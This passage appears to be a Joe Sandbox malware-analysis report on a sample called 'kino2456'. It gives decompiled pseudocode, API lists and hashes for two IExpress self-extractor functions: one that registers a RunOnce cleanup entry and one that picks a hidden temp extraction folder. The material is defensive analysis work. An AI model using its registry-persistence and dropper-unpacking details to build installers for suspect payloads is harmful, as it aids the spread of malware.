                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                    • Opcode ID: 56e972c6da9a68cd7661e37d19fbff5e34d34eec019be4f7d283fa5626c0700a
                                                                                                                                                                                                                                    • Instruction ID: 95e46943b64b819f2b1d168ab89eba8b793f09beddb6b7ac466a082ec2a1cb2c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56e972c6da9a68cd7661e37d19fbff5e34d34eec019be4f7d283fa5626c0700a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 379002642691004797111B749D1941575915A8E606B825464E011D4494DBB194506952
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 0096202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E0096202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x968004; // 0xf4cc89a0
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00966CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0096171E("wextract_cleanup2", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup2", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0096658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x969a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x9691e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x9691e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x9691e5);
						if(_t90 != 0) {
							 *0x968580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
							E0096171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E009644B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0096658A( &_v268, 0x104, 0x961140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x968530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                                                    0x0096202a
                                                                                                                                                                                                                                    0x00962035
                                                                                                                                                                                                                                    0x0096203c
                                                                                                                                                                                                                                    0x00962041
                                                                                                                                                                                                                                    0x00962050
                                                                                                                                                                                                                                    0x0096205f
                                                                                                                                                                                                                                    0x00962064
                                                                                                                                                                                                                                    0x0096206f
                                                                                                                                                                                                                                    0x0096208c
                                                                                                                                                                                                                                    0x00962094
                                                                                                                                                                                                                                    0x00962257
                                                                                                                                                                                                                                    0x00962266
                                                                                                                                                                                                                                    0x00962266
                                                                                                                                                                                                                                    0x0096209a
                                                                                                                                                                                                                                    0x0096209b
                                                                                                                                                                                                                                    0x0096209d
                                                                                                                                                                                                                                    0x009620aa
                                                                                                                                                                                                                                    0x009620af
                                                                                                                                                                                                                                    0x009620c9
                                                                                                                                                                                                                                    0x009620d1
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009620d3
                                                                                                                                                                                                                                    0x009620da
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009620da
                                                                                                                                                                                                                                    0x009620e2
                                                                                                                                                                                                                                    0x00962103
                                                                                                                                                                                                                                    0x0096210e
                                                                                                                                                                                                                                    0x00962116
                                                                                                                                                                                                                                    0x00962122
                                                                                                                                                                                                                                    0x00962128
                                                                                                                                                                                                                                    0x0096212c
                                                                                                                                                                                                                                    0x00962179
                                                                                                                                                                                                                                    0x00962194
                                                                                                                                                                                                                                    0x009621de
                                                                                                                                                                                                                                    0x009621e4
                                                                                                                                                                                                                                    0x00962256
                                                                                                                                                                                                                                    0x00962256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962256
                                                                                                                                                                                                                                    0x00962196
                                                                                                                                                                                                                                    0x00962196
                                                                                                                                                                                                                                    0x0096219c
                                                                                                                                                                                                                                    0x0096219f
                                                                                                                                                                                                                                    0x0096219f
                                                                                                                                                                                                                                    0x009621a1
                                                                                                                                                                                                                                    0x009621a2
                                                                                                                                                                                                                                    0x009621a6
                                                                                                                                                                                                                                    0x009621a8
                                                                                                                                                                                                                                    0x009621b0
                                                                                                                                                                                                                                    0x009621b0
                                                                                                                                                                                                                                    0x009621b2
                                                                                                                                                                                                                                    0x009621b3
                                                                                                                                                                                                                                    0x009621bc
                                                                                                                                                                                                                                    0x009621c7
                                                                                                                                                                                                                                    0x009621cb
                                                                                                                                                                                                                                    0x009621f1
                                                                                                                                                                                                                                    0x009621f6
                                                                                                                                                                                                                                    0x009621fd
                                                                                                                                                                                                                                    0x009621ff
                                                                                                                                                                                                                                    0x009621ff
                                                                                                                                                                                                                                    0x00962204
                                                                                                                                                                                                                                    0x00962213
                                                                                                                                                                                                                                    0x00962218
                                                                                                                                                                                                                                    0x0096221d
                                                                                                                                                                                                                                    0x0096221d
                                                                                                                                                                                                                                    0x00962220
                                                                                                                                                                                                                                    0x00962220
                                                                                                                                                                                                                                    0x00962222
                                                                                                                                                                                                                                    0x00962223
                                                                                                                                                                                                                                    0x00962229
                                                                                                                                                                                                                                    0x0096223d
                                                                                                                                                                                                                                    0x00962249
                                                                                                                                                                                                                                    0x00962250
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962250
                                                                                                                                                                                                                                    0x009621d2
                                                                                                                                                                                                                                    0x009621d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009621d9
                                                                                                                                                                                                                                    0x0096213a
                                                                                                                                                                                                                                    0x00962141
                                                                                                                                                                                                                                    0x00962144
                                                                                                                                                                                                                                    0x0096214c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962163
                                                                                                                                                                                                                                    0x00962172
                                                                                                                                                                                                                                    0x00962172
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962163
                                                                                                                                                                                                                                    0x009620ea
                                                                                                                                                                                                                                    0x009620f0
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 00962050
                                                                                                                                                                                                                                    • memset.MSVCRT ref: 0096205F
                                                                                                                                                                                                                                    • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0096208C
                                                                                                                                                                                                                                      • Part of subcall function 0096171E: _vsnprintf.MSVCRT ref: 00961750
                                                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009620C9
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009620EA
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 00962103
                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00962122
                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00962134
                                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00962144
                                                                                                                                                                                                                                    • GetSystemDirectoryA.KERNEL32 ref: 0096215B
                                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0096218C
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009621C1
                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009621E4
                                                                                                                                                                                                                                    • RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0096223D
                                                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00962249
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00962250
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                                                    • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
                                                                                                                                                                                                                                    • API String ID: 178549006-2663108224
                                                                                                                                                                                                                                    • Opcode ID: a3bd406f8c9d7de29adffe45b8d9976dc1d001e2118753e5b8c396ea51e67b4c
                                                                                                                                                                                                                                    • Instruction ID: 452aabd9f8ebc0977c8fbb447d90660b18837e567fbb7bf34a8ab88dd1a5f44e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a3bd406f8c9d7de29adffe45b8d9976dc1d001e2118753e5b8c396ea51e67b4c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC513671A18214ABDB209B60DC49FFB777CEB92700F0002A9FA45F7151EAB19E45DF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009655A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 232 9655a0-9655d9 call 96468f LocalAlloc 235 9655fd-96560c call 96468f 232->235 236 9655db-9655f1 call 9644b9 call 966285 232->236 241 965632-965643 lstrcmpA 235->241 242 96560e-965630 call 9644b9 LocalFree 235->242 251 9655f6-9655f8 236->251 245 965645 241->245 246 96564b-965659 LocalFree 241->246 242->251 245->246 249 965696-96569c 246->249 250 96565b-96565d 246->250 253 9656a2-9656a8 249->253 254 96589f-9658b5 call 966517 249->254 255 96565f-965667 250->255 256 965669 250->256 252 9658b7-9658c7 call 966ce0 251->252 253->254 258 9656ae-9656c1 GetTempPathA 253->258 254->252 255->256 259 96566b-96567a call 965467 255->259 256->259 263 9656f3-965711 call 961781 258->263 264 9656c3-9656c9 call 965467 258->264 271 965680-965691 call 9644b9 259->271 272 96589b-96589d 259->272 274 965717-965729 GetDriveTypeA 263->274 275 96586c-965890 GetWindowsDirectoryA call 96597d 263->275 270 9656ce-9656d0 264->270 270->272 276 9656d6-9656df call 962630 270->276 271->251 272->252 278 965730-965740 GetFileAttributesA 274->278 279 96572b-96572e 274->279 275->263 288 965896 275->288 276->263 289 9656e1-9656ed call 965467 276->289 282 965742-965745 278->282 283 96577e-96578f call 96597d 278->283 279->278 279->282 286 965747-96574f 282->286 287 96576b 282->287 295 9657b2-9657bf call 962630 283->295 296 965791-96579e call 962630 283->296 291 965771-965779 286->291 292 965751-965753 286->292 287->291 288->272 289->263 289->272 298 965864-965866 291->298 292->291 297 965755-965762 call 966952 292->297 307 9657d3-9657f8 call 96658a GetFileAttributesA 295->307 308 9657c1-9657cd GetWindowsDirectoryA 295->308 296->287 306 9657a0-9657b0 call 96597d 296->306 297->287 309 965764-965769 297->309 298->274 298->275 306->287 306->295 314 96580a 307->314 315 9657fa-965808 CreateDirectoryA 307->315 308->307 309->283 309->287 316 96580d-96580f 314->316 315->316 317 965827-96585c SetFileAttributesA call 961781 call 965467 316->317 318 965811-965825 316->318 317->272 323 96585e 317->323 318->298 323->298
                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E009655A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x968004; // 0xf4cc89a0
				_v8 = _t28 ^ _t110;
				_t2 = E0096468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0096468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x969a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x968b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x968a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00966517(_t82, 0x7d2, 0, E00963210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x969a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x9691e4;
									_t40 = GetTempPathA(0x104, 0x9691e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00961781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00966952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0096597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00962630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0096658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x9691e4;
																					E00961781(0x9691e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00965467(0x9691e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00962630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0096597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00965467(0x9691e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x9691e4;
											_t70 = E00962630(0, 0x9691e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x9691e4;
												_t71 = E00965467(0x9691e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0096597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x968b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00965467(0x968b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E009644B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E009644B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x969124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E009644B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x969124 = E00966285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00966CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                                                    0x009655ab
                                                                                                                                                                                                                                    0x009655b2
                                                                                                                                                                                                                                    0x009655c9
                                                                                                                                                                                                                                    0x009655d5
                                                                                                                                                                                                                                    0x009655d9
                                                                                                                                                                                                                                    0x00965600
                                                                                                                                                                                                                                    0x00965605
                                                                                                                                                                                                                                    0x0096560a
                                                                                                                                                                                                                                    0x0096560c
                                                                                                                                                                                                                                    0x00965638
                                                                                                                                                                                                                                    0x00965641
                                                                                                                                                                                                                                    0x00965643
                                                                                                                                                                                                                                    0x00965645
                                                                                                                                                                                                                                    0x00965645
                                                                                                                                                                                                                                    0x0096564c
                                                                                                                                                                                                                                    0x00965652
                                                                                                                                                                                                                                    0x00965657
                                                                                                                                                                                                                                    0x00965659
                                                                                                                                                                                                                                    0x00965696
                                                                                                                                                                                                                                    0x0096569c
                                                                                                                                                                                                                                    0x0096589f
                                                                                                                                                                                                                                    0x009658a7
                                                                                                                                                                                                                                    0x009658ac
                                                                                                                                                                                                                                    0x009658b3
                                                                                                                                                                                                                                    0x009658b5
                                                                                                                                                                                                                                    0x009656a2
                                                                                                                                                                                                                                    0x009656a2
                                                                                                                                                                                                                                    0x009656a8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009656ae
                                                                                                                                                                                                                                    0x009656ae
                                                                                                                                                                                                                                    0x009656b9
                                                                                                                                                                                                                                    0x009656bf
                                                                                                                                                                                                                                    0x009656c1
                                                                                                                                                                                                                                    0x009656f3
                                                                                                                                                                                                                                    0x009656f3
                                                                                                                                                                                                                                    0x00965705
                                                                                                                                                                                                                                    0x0096570a
                                                                                                                                                                                                                                    0x00965711
                                                                                                                                                                                                                                    0x00965717
                                                                                                                                                                                                                                    0x00965724
                                                                                                                                                                                                                                    0x00965726
                                                                                                                                                                                                                                    0x00965729
                                                                                                                                                                                                                                    0x00965730
                                                                                                                                                                                                                                    0x00965737
                                                                                                                                                                                                                                    0x0096573d
                                                                                                                                                                                                                                    0x00965740
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096572b
                                                                                                                                                                                                                                    0x0096572b
                                                                                                                                                                                                                                    0x0096572e
                                                                                                                                                                                                                                    0x00965742
                                                                                                                                                                                                                                    0x00965742
                                                                                                                                                                                                                                    0x00965745
                                                                                                                                                                                                                                    0x0096576b
                                                                                                                                                                                                                                    0x0096576b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965747
                                                                                                                                                                                                                                    0x00965747
                                                                                                                                                                                                                                    0x0096574d
                                                                                                                                                                                                                                    0x0096574f
                                                                                                                                                                                                                                    0x00965771
                                                                                                                                                                                                                                    0x00965771
                                                                                                                                                                                                                                    0x00965773
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965751
                                                                                                                                                                                                                                    0x00965751
                                                                                                                                                                                                                                    0x00965753
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965755
                                                                                                                                                                                                                                    0x0096575b
                                                                                                                                                                                                                                    0x00965760
                                                                                                                                                                                                                                    0x00965762
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965764
                                                                                                                                                                                                                                    0x00965764
                                                                                                                                                                                                                                    0x00965769
                                                                                                                                                                                                                                    0x0096577e
                                                                                                                                                                                                                                    0x0096577e
                                                                                                                                                                                                                                    0x00965781
                                                                                                                                                                                                                                    0x00965788
                                                                                                                                                                                                                                    0x0096578d
                                                                                                                                                                                                                                    0x0096578f
                                                                                                                                                                                                                                    0x009657b2
                                                                                                                                                                                                                                    0x009657b8
                                                                                                                                                                                                                                    0x009657bd
                                                                                                                                                                                                                                    0x009657bf
                                                                                                                                                                                                                                    0x009657cd
                                                                                                                                                                                                                                    0x009657cd
                                                                                                                                                                                                                                    0x009657dd
                                                                                                                                                                                                                                    0x009657e3
                                                                                                                                                                                                                                    0x009657ef
                                                                                                                                                                                                                                    0x009657f5
                                                                                                                                                                                                                                    0x009657f8
                                                                                                                                                                                                                                    0x0096580a
                                                                                                                                                                                                                                    0x0096580a
                                                                                                                                                                                                                                    0x009657fa
                                                                                                                                                                                                                                    0x00965802
                                                                                                                                                                                                                                    0x00965802
                                                                                                                                                                                                                                    0x0096580d
                                                                                                                                                                                                                                    0x0096580f
                                                                                                                                                                                                                                    0x00965830
                                                                                                                                                                                                                                    0x00965836
                                                                                                                                                                                                                                    0x0096583d
                                                                                                                                                                                                                                    0x0096584b
                                                                                                                                                                                                                                    0x00965851
                                                                                                                                                                                                                                    0x00965855
                                                                                                                                                                                                                                    0x0096585a
                                                                                                                                                                                                                                    0x0096585c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096585e
                                                                                                                                                                                                                                    0x0096585e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096585e
                                                                                                                                                                                                                                    0x00965811
                                                                                                                                                                                                                                    0x00965817
                                                                                                                                                                                                                                    0x00965819
                                                                                                                                                                                                                                    0x0096581f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096581f
                                                                                                                                                                                                                                    0x00965791
                                                                                                                                                                                                                                    0x00965797
                                                                                                                                                                                                                                    0x0096579c
                                                                                                                                                                                                                                    0x0096579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009657a0
                                                                                                                                                                                                                                    0x009657a9
                                                                                                                                                                                                                                    0x009657ae
                                                                                                                                                                                                                                    0x009657b0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009657b0
                                                                                                                                                                                                                                    0x0096579e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965769
                                                                                                                                                                                                                                    0x00965762
                                                                                                                                                                                                                                    0x00965753
                                                                                                                                                                                                                                    0x0096574f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096572e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965864
                                                                                                                                                                                                                                    0x00965864
                                                                                                                                                                                                                                    0x00965864
                                                                                                                                                                                                                                    0x00965717
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009656c3
                                                                                                                                                                                                                                    0x009656c5
                                                                                                                                                                                                                                    0x009656c9
                                                                                                                                                                                                                                    0x009656ce
                                                                                                                                                                                                                                    0x009656d0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009656d6
                                                                                                                                                                                                                                    0x009656d6
                                                                                                                                                                                                                                    0x009656d8
                                                                                                                                                                                                                                    0x009656dd
                                                                                                                                                                                                                                    0x009656df
